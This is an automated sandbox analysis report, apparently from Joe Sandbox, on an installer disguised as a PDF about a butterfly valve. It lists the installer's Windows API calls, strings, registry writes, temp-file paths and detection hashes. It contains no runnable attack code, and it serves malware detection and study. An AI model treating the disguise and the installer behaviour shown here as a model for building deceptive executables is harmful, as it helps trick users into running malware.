Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a8d2051a0b43e45e0548476364d3f5ec7a3e7dc7c9238cb7b637b6be69fa9f30
Instruction ID: a95b2630499809d01a6e7b037cab792d100f7a465f9f887e4e98b5ff960ae470
Opcode Fuzzy Hash: a8d2051a0b43e45e0548476364d3f5ec7a3e7dc7c9238cb7b637b6be69fa9f30
Instruction Fuzzy Hash: 79F0A7726082009BE701E7A49949AEE7778DB61314F60057BE241A21C1D7B84985AB3A

Function 00404027 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040B2
GetDlgItem.USER32(00000000,000003E8), ref: 004040C6
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040E4
GetSysColor.USER32(?), ref: 004040F5
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404104
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404113
lstrlenA.KERNEL32(?), ref: 00404116
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404125
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413A
GetDlgItem.USER32(?,0000040A), ref: 0040419C
SendMessageA.USER32(00000000), ref: 0040419F
GetDlgItem.USER32(?,000003E8), ref: 004041CA
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420A
LoadCursorA.USER32(00000000,00007F02), ref: 00404219
SetCursor.USER32(00000000), ref: 00404222
ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404235
LoadCursorA.USER32(00000000,00007F00), ref: 00404242
SetCursor.USER32(00000000), ref: 00404245
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404271
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404285

Strings

N, xrefs: 004041B8
open, xrefs: 0040422D
: Completed, xrefs: 004041F5

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$N$open
API String ID: 3615053054-3069340868
Opcode ID: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
Instruction ID: f5dd8c80699fee66c1c508087d6ededbe7bbcdfb93c9c5870bdb982cd402330a
Opcode Fuzzy Hash: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
Instruction Fuzzy Hash: 1261C5B1A40209BFEB109F61DC45F6A7B79FB84741F10807AFB057A2D1C7B8A951CB98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
Instruction ID: a0b7ce50fec83efafeb16569406a1c152c04985fcf8b97c7298fc3655e55bd79
Opcode Fuzzy Hash: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
Instruction Fuzzy Hash: CD419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405A42 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421A98,NUL,?,00000000,?,00000000,00405BD5,?,?), ref: 00405A51
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BD5,?,?), ref: 00405A75
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405A7E

Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913

GetShortPathNameA.KERNEL32(00421E98,00421E98,00000400), ref: 00405A9B
wsprintfA.USER32 ref: 00405AB9
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405AF4
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B03
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3B
SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B91
GlobalFree.KERNEL32(00000000), ref: 00405BA2
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BA9

Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,80000000,00000003), ref: 00405970
Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992

Strings

[Rename], xrefs: 00405B23, 00405B35
%s=%s, xrefs: 00405AAF
NUL, xrefs: 00405A4B

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 29faa2ef249efea023fcf9d7dc18c5a7494662307f22d41ae8b698d121cf93b2
Instruction ID: 42b7cc2c3f2f4ef7c3412fd2f3d3cbe4eee66c4c235e50fd6e5efd85f9217fc4
Opcode Fuzzy Hash: 29faa2ef249efea023fcf9d7dc18c5a7494662307f22d41ae8b698d121cf93b2
Instruction Fuzzy Hash: 9931E271A04B19ABD2206B619C89F6B3A6CDF45755F14003AFE05F62D2DA7CBC008E6D

Function 00405F64 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FBC
CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
CharNextA.USER32(?,"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FCE
CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FDE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F65
"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", xrefs: 00405FA0
*?|<>/":, xrefs: 00405FAC

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3434493804
Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction ID: a0964663e3c08fb0288e5f4f4a0160773f2bbbf5a4d40b443b4f636863f092b1
Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction Fuzzy Hash: C611C451808F922EEB3216640C44BBB7F99CF5A760F18007BE9D4B22C2D67C5C429F6E

Function 00403F45 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F62
GetSysColor.USER32(00000000), ref: 00403F7E
SetTextColor.GDI32(?,00000000), ref: 00403F8A
SetBkMode.GDI32(?,?), ref: 00403F96
GetSysColor.USER32(?), ref: 00403FA9
SetBkColor.GDI32(?,?), ref: 00403FB9
DeleteObject.GDI32(?), ref: 00403FD3
CreateBrushIndirect.GDI32(?), ref: 00403FDD

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: 563dd17f99c902cd34f005863f03740a6a5938172a6e5e033378c94734032825
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: B4214271908705ABC7219F68DD48F4BBFF8AF01715B048A29E895E26E0D735EA04CB55

Function 004047DD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047F8
GetMessagePos.USER32 ref: 00404800
ScreenToClient.USER32(?,?), ref: 0040481A
SendMessageA.USER32(?,00001111,00000000,?), ref: 0040482C
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404852

Strings

f, xrefs: 0040482E

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 206dc1e0429e6aa6b627cd25208fa2295557d59b2a7717453fa0c9894da25502
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: E6015276D00259BADB01DB94DC45FFEBBBCAF55711F10412BBA10B61C0C7B4A501CBA5

Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
MulDiv.KERNEL32(0001D200,00000064,000765D0), ref: 00402BC5
wsprintfA.USER32 ref: 00402BD5
SetWindowTextA.USER32(?,?), ref: 00402BE5
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7

Strings

verifying installer: %d%%, xrefs: 00402BCF

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
Instruction ID: bd73235a5a2a729140de961e31d76a0e47d27260d0eaef7d75f80e35c4c54abd
Opcode Fuzzy Hash: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
Instruction Fuzzy Hash: EF01F471540208BBEF109F60DD49EEE3B79EB04305F008039FA16B51D1D7B59955DF59

Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3

Strings

Tahoma, xrefs: 00401D99

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
Instruction ID: 818c9bdddfe1b1fffd76dbb1b88acba4993fd419864b94457e62d7fc32e1ff32
Opcode Fuzzy Hash: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
Instruction Fuzzy Hash: FE016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E3C67811569B3F

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 0f1953924fa823fa64f56edeb7276902427a35836a51b24fa44fe1db59ad754c
Instruction ID: 55e8cf3ffad71cabca96213aa966ad8f6b0c6824c0bc9dabfeb9c0d6c9f08848
Opcode Fuzzy Hash: 0f1953924fa823fa64f56edeb7276902427a35836a51b24fa44fe1db59ad754c
Instruction Fuzzy Hash: 03217C71800124BBCF216FA5DE89EAE7A79EF09324F14023AF950762D1C7795D418FA9

Function 004046D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Robotagtige Setup: Completed,Robotagtige Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
wsprintfA.USER32 ref: 00404779
SetDlgItemTextA.USER32(?,Robotagtige Setup: Completed), ref: 0040478C

Strings

Robotagtige Setup: Completed, xrefs: 00404763, 00404768, 0040476E, 00404782
%u.%u%s%s, xrefs: 0040475B

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Robotagtige Setup: Completed
API String ID: 3540041739-3490619918
Opcode ID: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
Instruction ID: 079308417c3a62341de1df324b483ce4e469374b9790fc4fe8de96a48b85a08e
Opcode Fuzzy Hash: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
Instruction Fuzzy Hash: F011A573A0412837EB0065699C45EAF3298DB86374F254637FA25F71D2EA788C5245A8

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst5070.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nst5070.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst5070.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Strings

C:\Users\user\AppData\Local\Temp\nst5070.tmp, xrefs: 004023B3, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

